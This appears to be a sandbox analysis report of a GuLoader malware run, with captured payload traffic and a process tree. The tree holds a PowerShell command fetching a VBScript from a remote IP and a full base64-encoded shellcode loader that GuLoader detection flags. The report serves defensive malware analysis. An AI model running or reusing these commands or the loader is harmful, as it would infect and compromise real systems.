                  Data Raw: 27 65 6c 61 65 6f 63 61 72 20 46 72 65 64 6e 69 38 20 6b 69 6c 64 65 74 65 6b 73 20 53 45 4b 53 45 52 45 4e 20 74 72 6b 6e 69 6e 67 73 20 42 6c 6f 6d 73 74 65 72 67 61 20 44 72 75 6d 6d 65 72 73 35 20 52 61 6d 68 65 20 54 76 75 6e 67 65 6e 20 56 65 72 6d 69 63 6c 65 6e 6f 20 52 59 47 53 54 44 49 4e 44 49 20 4b 6f 6e 74 65 72 65 20 41 62 6f 72 74 65 64 65 20 4b 52 45 54 20 61 67 74 65 74 73 65 64 20 4d 69 64 74 76 65 38 20 53 75 70 72 61 63 20 49 6e 63 72 75 73 20 42 61 6c 6e 65 61 65 75 36 20 53 79 73 74 65 6d 72 65 6c 61 34 20 4e 41 54 49 4f 4e 45 52 20 64 65 6e 65 67 61 74 20 49 6e 74 65 72 70 6c 61 79 20 49 6e 74 65 72 67 65 6e 20 64 61 6e 64 79 69 73 6d 73 20 46 45 52 52 20 0d 0a 27 54 56 49 4c 4c 49 4e 20 4f 76 65 72 6d 37 20 4b 76 61 72 6b 73 73 75 62 73 36 20 55 4e 44 45 52 46 52 20 6e 69 65 6c 6c 65 20 54 61 62 61 63 69 6e 67 65 35 20 54 69 6d 65 76 69 73 74 73 61 34 20 41 50 53 49 20 43 68 72 69 73 72 6f 38 20 6c 61 70 70 69 73 68 63 64 67 20 75 6e 6d 61 74 63 68 61 62 20 66 72 73 74 65 66 64 73 65 6c 20 42 45 56 47 45 4c 53 45 20 72 65 6c 69 63 61 72 79 20 50 72 65 64 65 6e 69 61 37 20 41 6e 73 67 6e 69 6e 67 20 73 74 69 6b 73 61 20 53 6f 6c 66 20 42 4c 4f 4b 46 55 4e 4b 54 49 20 4b 61 74 61 72 61 6b 74 33 20 73 69 64 65 72 65 66 65 20 0d 0a 27 73 63 68 a4 75 62 6c 65 20 53 79 67 65 73 36 20 64 69 62 62 75 6b 73 69 6c 20 42 6c 6f 6d 73 20 48 4f 52 53 45 20 74 65 6c 65 6f 70 70 20 4f 6d 62 75 64 64 65 74 73 20 43 65 6e 74 72 35 20 42 6f 75 6c 65 76 61 72 64 74 20 42 69 70 69 6e 6e 61 74 38 20 41 46 42 4c 53 20 72 65 69 6e 64 75 63 65 20 6f 76 65 72 65 6c 61 62 20 4b 6f 67 65 67 35 20 63 61 6e 74 69 6f 6e 61 72 62 20 49 6d 6d 75 6e 64 69 63 33 20 61 62 62 65 64 20 4d 4f 4e 45 54 49 5a 20 62 72 61 6e 63 20 53 65 6d 69 6d 65 64 69 63 20 57 41 47 49 4e 47 52 20 0d 0a 27 50 61 6e 74 68 65 69 73 6d 31 20 45 66 74 65 72 62 38 20 43 72 69 74 69 63 20 54 61 6c 6c 73 65 75 6e 33 20 49 6e 66 6c 6f 77 73 32 20 64 69 73 73 65 20 54 65 67 6e 65 62 6c 6f 6b 33 20 47 6f 6f 64 68 65 61 72 20 52 61 61 6f 6c 69 65 72 6e 65 20 0d 0a 27 45 67 65 74 66 6f 72 62 20 74 6f 72 73 6b 20 6b 72 75 6d 61 20 53 6f 6e 69 6e 67 65 72 73 77 33 20 54 68 65 6f 34 20 46 52 45 4d 52 59 4b 4e 49 4e 20 49 6e 66 65 72 72 65 72 69 20 75 6e 70 72 65 64 20 49 4e 44 45 53 4e 45 45 4e 20 65 71 75 69 76 61 6c 20 4f 56 45 52 44 45 4c 49 43 20 69 6e 64 66 20 76 69 64 65 6f 6b 61 6d 65 72 20 45 6e 65 72 67 69 6d 6e 31 20 44 6f 67 66 20 4b 61 73 74 65 20 0d 0a 27 51 75 69 6c 74 73 6b 72 61 20 51 75 61 62 69 72 64 6f 70 20 55 64 72 61 61 37 20 73 76 61 72 62 72 65 76 65 20 48 69 63 6b 73 69 74 20 6f 63 68 65 72 73 65 70 69 73 20 55 6e 6c 61 62 69 61 6c 20 43 6c 69 71 20 56 65 6e 64 69 6e 67 65 31 20 4f 76 65 72 73 69 67 73 74 61 35 20 42 4f 4e 46 49 4c 20 53 75 6d 70 66 31 20 55 66 6f 72 34 20 47 72 61 76 65 6d 61 73 6b 69 20 48 79 70 65 72 70 65 72 66 65 31 20 63 61 74 65 67 6f 20 44 69 73 63 69 70 6c 32 20 46 41 4c 53 20 54 77 69 6e 6a 65 74 63 61 6c 32 20 45 4c 4f 52 47 4c 45 52 53 41 20 45 72 6f 74 69 6b 73 20 41 6c 70 68 20 53 65 6e 6e 69 67 68 74 75 6e 36 20 46 69 62 72 6f 61 20 53 6b 61 72 65 76 20 4e 4f 4e 45 52 52 4f 4e
                  Data Ascii: 'elaeocar Fredni8 kildeteks SEKSEREN trknings Blomsterga Drummers5 Ramhe Tvungen Vermicleno RYGSTDINDI Kontere Abortede KRET agtetsed Midtve8 Suprac Incrus Balneaeu6 Systemrela4 NATIONER denegat Interplay Intergen dandyisms FERR 'TVILLIN Overm7 Kvarkssubs6 UNDERFR nielle Tabacinge5 Timevistsa4 APSI Chrisro8 lappishcdg unmatchab frstefdsel BEVGELSE relicary Predenia7 Ansgning stiksa Solf BLOKFUNKTI Katarakt3 siderefe 'schuble Syges6 dibbuksil Bloms HORSE teleopp Ombuddets Centr5 Boulevardt Bipinnat8 AFBLS reinduce overelab Kogeg5 cantionarb Immundic3 abbed MONETIZ branc Semimedic WAGINGR 'Pantheism1 Efterb8 Critic Tallseun3 Inflows2 disse Tegneblok3 Goodhear Raaolierne 'Egetforb torsk kruma Soningersw3 Theo4 FREMRYKNIN Inferreri unpred INDESNEEN equival OVERDELIC indf videokamer Energimn1 Dogf Kaste 'Quiltskra Quabirdop Udraa7 svarbreve Hicksit ochersepis Unlabial Cliq Vendinge1 Oversigsta5 BONFIL Sumpf1 Ufor4 Gravemaski Hyperperfe1 catego Discipl2 FALS Twinjetcal2 ELORGLERSA Erotiks Alph Sennightun6 Fibroa Skarev NONERRON
                  May 10, 2022 18:44:40.438370943 CEST221INData Raw: 45 20 46 4c 4a 4d 41 4e 44 53 55 44 20 73 6c 61 75 67 68 74 20 55 4e 41 42 55 53 49 20 53 75 70 65 36 20 0d 0a 27 53 69 6e 67 6c 65 74 72 65 20 42 69 6e 64 65 62 6c 33 20 44 61 6e 74 65 73 71 37 20 43 45 52 45 4d 45 4e 54 53 20 73 76 69 6e 65 6d
                  Data Ascii: E FLJMANDSUD slaught UNABUSI Supe6 'Singletre Bindebl3 Dantesq7 CEREMENTS svinemi Basidi HAANDVGT ISTH afspalt 'CAPATAZC Stra tetrach LIVERP regrippe BNDSEL nimb APOLLONIC Rifa5 Hyperdelic9 Polarizat stala SPIDSVINK DERTIL ANSOEG 'Tidssk
                  May 10, 2022 18:44:40.438388109 CEST222INData Raw: 4b 61 74 61 6c 79 73 36 20 42 72 75 74 69 73 68 6c 79 65 36 20 56 65 6c 6b 6f 20 74 72 65 61 74 79 20 4d 61 74 65 20 73 73 74 65 72 20 53 48 55 4c 57 41 55 52 53 20 64 65 64 69 6b 65 72 65 64 65 20 49 6e 61 72 6b 20 68 6c 64 6e 69 6e 67 73 6b 6f
                  Data Ascii: Katalys6 Brutishlye6 Velko treaty Mate sster SHULWAURS dedikerede Inark hldningsko spovechab Flabere7 Deltidsb 'UNSUFFIX Humfeyle ZANZAS Recrea6 Afgan1 Forelsk2 artsflle Crataegus Stati7 REACUAINT Asiate Viewiestk1 Chokbl5 Ldrebyrde Edentors
                  May 10, 2022 18:44:40.438405991 CEST224INData Raw: 52 20 6f 76 65 72 74 65 63 68 20 61 6e 74 68 72 20 55 4e 45 43 48 4f 20 44 61 65 6b 73 70 6f 20 46 61 73 74 6c 67 67 20 55 6e 6b 6e 69 67 68 74 20 54 65 68 75 73 65 74 73 20 70 69 7a 7a 61 62 61 72 65 20 4d 61 63 75 6c 65 64 6e 6f 20 72 75 66 6f
                  Data Ascii: R overtech anthr UNECHO Daekspo Fastlgg Unknight Tehusets pizzabare Maculedno rufo BALANCERR Ligbr8 BEESWI NAZIPA ENERGIM MUTESC Schedulab 'Bagerbut9 udstation Tephros ALTERNA Urfuglene Reductio4 Tympanomas5 Hepteneg Slettetast afskrivni glo
                  May 10, 2022 18:44:40.461571932 CEST225INData Raw: 41 41 58 7a 45 39 4e 41 41 58 7a 58 6f 72 33 33 33 31 36 34 34 42 39 39 58 6f 72 33 33 33 33 4e 41 41 58 7a 33 39 44 41 58 6f 72 33 33 33 39 35 37 37 58 6f 72 33 33 33 38 31 58 6f 72 33 33 33 32 42 31 37 38 45 44 58 6f 72 33 33 33 22 0d 0a 44 65
                  Data Ascii: AAXzE9NAAXzXor3331644B99Xor3333NAAXz39DAXor3339577Xor33381Xor3332B178EDXor333"Dent = Dent & "4D9E9D9Xor333Xor333EBNAAXzDE7DNAAXzD3CAE399BBDE2Xor333B3BNAAXzXor333Xor333CD81EAC1A8B35Xor333NAAXzXor333E9E966NAAXzXor33366D1EB16B22DBC5349Xor333NAA
                  May 10, 2022 18:44:40.461605072 CEST227INData Raw: 33 33 33 36 44 39 58 6f 72 33 33 33 44 45 42 31 38 45 36 39 31 44 33 35 4e 41 41 58 7a 35 31 44 37 4e 41 41 58 7a 31 33 58 6f 72 33 33 33 43 39 32 41 43 34 33 41 39 33 31 32 39 34 43 42 41 44 4e 41 41 58 7a 37 42 34 32 35 44 34 4e 41 41 58 7a 39
                  Data Ascii: 3336D9Xor333DEB18E691D35NAAXz51D7NAAXz13Xor333C92AC43A931294CBADNAAXz7B425D4NAAXz92613E8EAXor333EXor333Xor333Xor333Xor3337CC43NAAXzNAAXz"Dent = Dent & "Xor333954BNAAXzC8Xor333267C6C124Xor33342Xor333ENAAXz3C7D57DNAAXz789B9515BA3B2B2Xor333DC8X
                  May 10, 2022 18:44:40.461627007 CEST228INData Raw: 33 58 6f 72 33 33 33 58 6f 72 33 33 33 58 6f 72 33 33 33 58 6f 72 33 33 33 58 6f 72 33 33 33 58 6f 72 33 33 33 58 6f 72 33 33 33 58 6f 72 33 33 33 58 6f 72 33 33 33 58 6f 72 33 33 33 58 6f 72 33 33 33 58 6f 72 33 33 33 58 6f 72 33 33 33 58 6f 72
                  Data Ascii: 3Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333A6Xor3331867NAAXz44B5C61E5E14NAAXzB62E425Xor"Dent = Dent & "33386B17B9BAA1DDCXor333Xor333NAAXz2BAE4NAAXzNAAXz271A3
                  May 10, 2022 18:44:40.461647987 CEST229INData Raw: 31 32 41 45 43 43 38 22 0d 0a 44 65 6e 74 20 3d 20 44 65 6e 74 20 26 20 22 32 41 32 35 42 31 36 33 42 31 32 41 37 39 31 41 38 35 4e 41 41 58 7a 4e 41 41 58 7a 44 39 32 45 4e 41 41 58 7a 32 32 32 33 4e 41 41 58 7a 45 34 41 39 58 6f 72 33 33 33 58
                  Data Ascii: 12AECC8"Dent = Dent & "2A25B163B12A791A85NAAXzNAAXzD92ENAAXz2223NAAXzE4A9Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor333Xor33"
                  May 10, 2022 18:44:40.461669922 CEST231INData Raw: 45 41 58 6f 72 33 33 33 39 35 4e 41 41 58 7a 45 39 35 32 32 44 38 37 31 33 58 6f 72 33 33 33 32 32 33 4e 41 41 58 7a 35 36 35 39 22 0d 0a 44 65 6e 74 20 3d 20 44 65 6e 74 20 26 20 22 32 35 42 33 43 35 31 42 58 6f 72 33 33 33 35 33 32 32 43 44 32
                  Data Ascii: EAXor33395NAAXzE9522D8713Xor333223NAAXz5659"Dent = Dent & "25B3C51BXor3335322CD23EDA981777NAAXzD6NAAXz1E968DED1C6Xor33328C38BB47E5E437D666Xor3339875C1A62D8551B152EE363E9Xor3333ECE4BCC6ECEXor333NAAXzEE117NAAXzD2BBB9DBNAAXzC"Dent = Dent & "4
                  May 10, 2022 18:44:40.461694002 CEST232INData Raw: 6e 74 20 3d 20 44 65 6e 74 20 26 20 22 41 41 45 37 44 39 44 38 38 33 45 41 58 6f 72 33 33 33 41 33 43 41 33 43 33 34 41 44 45 43 42 31 34 31 36 31 34 58 6f 72 33 33 33 58 6f 72 33 33 33 4e 41 41 58 7a 43 44 33 39 58 6f 72 33 33 33 43 33 39 37 58
                  Data Ascii: nt = Dent & "AAE7D9D883EAXor333A3CA3C34ADECB141614Xor333Xor333NAAXzCD39Xor333C397Xor333A39872DNAAXzCNAAXzXor3337BABA829915ANAAXz9NAAXzE49593A938E2D88131Xor33335Xor33391D8EB9NAAXz6A3C9C36BB13BB1AADC6992EE28Xor333NAAXz19A8CNAAXzXor333EAA364394Xo
                  May 10, 2022 18:44:40.461715937 CEST234INData Raw: 43 4e 41 41 58 7a 41 38 43 34 58 6f 72 33 33 33 33 32 45 42 31 32 31 39 41 37 33 41 4e 41 41 58 7a 31 34 45 31 35 37 45 38 42 42 43 4e 41 41 58 7a 58 6f 72 33 33 33 43 31 42 37 4e 41 41 58 7a 33 32 45 42 43 22 0d 0a 44 65 6e 74 20 3d 20 44 65 6e
                  Data Ascii: CNAAXzA8C4Xor33332EB1219A73ANAAXz14E157E8BBCNAAXzXor333C1B7NAAXz32EBC"Dent = Dent & "596A3C3NAAXzA6479Xor3338C38Xor333Xor33347NAAXz285NAAXz11NAAXz42914E1Xor3333D2NAAXzAB3Xor333C184975Xo"Dent = Dent & "r333C19BB3Xor333275C1EBXor3339NAAXzNAA


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:1
                  Start time:18:44:30
                  Start date:10/05/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\book.ps1
                  Imagebase:0x7ff6ba650000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Target ID:2
                  Start time:18:44:30
                  Start date:10/05/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff647620000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:3
                  Start time:18:44:34
                  Start date:10/05/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs
                  Imagebase:0x7ff6ba650000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Target ID:11
                  Start time:18:44:55
                  Start date:10/05/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs"
                  Imagebase:0x7ff6e4820000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:14
                  Start time:18:45:16
                  Start date:10/05/2022
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAGUAbgBhAHQAZQByAGYAbwA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVABJAE8ATABPAEcAIgApAC4AQQBjAGUAdABhAG0AaQBkAHAAaAAyAA0ACgANAAoAJABVAHQAaQBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAFsAXQBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBdACwAJABTAGUAbgBhAHQAZQByAGYAbwAuAEwAZQBuAGcAdABoACAALwAgADIAKQANAAoADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAUwBlAG4AYQB0AGUAcgBmAG8ALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkADQAKAAkAewANAAoAIAAgACAAIAAgACAAIAAgACQAVQB0AGkAbABbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAFMAZQBuAGEAdABlAHIAZgBvAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkADQAKACAAIAAgACAAfQANAAoADQAKAA0ACgBmAG8AcgAoACQAYwBvAG4AYwBvAG0AaQB0AGEAPQAwADsAIAAkAGMAbwBuAGMAbwBtAGkAdABhACAALQBsAHQAIAAkAFUAdABpAGwALgBjAG8AdQBuAHQAIAA7ACAAJABjAG8AbgBjAG8AbQBpAHQAYQArACsAKQANAAoAewANAAoACQANAAoAWwBIAGUAeABhAHMAdABpAGMAaAAxAF0AOgA6AFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKAAkAEgAZQB4AGEAcwB0AGkAYwBoADMAKwAkAGMAbwBuAGMAbwBtAGkAdABhACwAWwByAGUAZgBdACQAVQB0AGkAbABbACQAYwBvAG4AYwBvAG0AaQB0AGEAXQAsADEAKQANAAoADQAKAH0ADQAKAFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEgAZQB4AGEAcwB0AGkAYwBoADMALAAgADAAKQANAAoADQAKAA0ACgA=
                  Imagebase:0xb70000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.544284081.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Target ID:15
                  Start time:18:45:16
                  Start date:10/05/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff647620000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:18
                  Start time:18:45:56
                  Start date:10/05/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline
                  Imagebase:0x30000
                  File size:2170976 bytes
                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:moderate

                  General

                  Target ID:19
                  Start time:18:45:59
                  Start date:10/05/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP"
                  Imagebase:0x1230000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 00007FFF7F001CE0 Relevance: .1, Instructions: 114COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.341426250.00007FFF7F000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F000000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7fff7f000000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a7e5942dd537deec571ec3b6e16bf8320445c65e299685a522d8f16f7b7a3fe
                    • Instruction ID: 628dabe860ca99ef71ed44f5c3e8266e5b53c90e9efe030b6b5765c625171b9d
                    • Opcode Fuzzy Hash: 1a7e5942dd537deec571ec3b6e16bf8320445c65e299685a522d8f16f7b7a3fe
                    • Instruction Fuzzy Hash: 4631A23291C7894FD305DB18D4516AABBE1EF95320F0406BBF489C73A6DA28E945C7C2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FFF7F001775 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.341426250.00007FFF7F000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F000000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7fff7f000000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 755fe3cbdcad416eefa6f1acdf45f264f29895f7ace63e8cb25328fa015116ad
                    • Instruction ID: d38a62977d31ada266e60a8497e329f06c0254d76b0fcbf56d2406822144e778
                    • Opcode Fuzzy Hash: 755fe3cbdcad416eefa6f1acdf45f264f29895f7ace63e8cb25328fa015116ad
                    • Instruction Fuzzy Hash: 5901677115CB0C4FD744EF0CE451AA6B7E0FB95364F10056EE58AC3695DA36E882CB45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00007FFF7F001978 Relevance: .5, Instructions: 481COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.341426250.00007FFF7F000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F000000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_7fff7f000000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 126d782bdf31a0988185e6bc381d7f5c5c12180f9659e0a812247840efb6d1f4
                    • Instruction ID: 134e7bb6514a0615f6e4a34ff72edaa79e85243a7335e78446f8dcb0d3819d8d
                    • Opcode Fuzzy Hash: 126d782bdf31a0988185e6bc381d7f5c5c12180f9659e0a812247840efb6d1f4
                    • Instruction Fuzzy Hash: 54E14932A2CB4A4FD329DB28D484675F7D1EF55320B14857EE48AC77DADA25B842C7C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    Function 00007FFF7F011CE0 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.301290087.00007FFF7F010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F010000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7fff7f010000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fcc69ba2726b45e447befc2a6b497216fab5be38881b0102f73ee1c3adaa9624
                    • Instruction ID: 1dd6187c37353964f03bd2b7b74da87ee59089d2a992bbe3f062dc19f71a07f2
                    • Opcode Fuzzy Hash: fcc69ba2726b45e447befc2a6b497216fab5be38881b0102f73ee1c3adaa9624
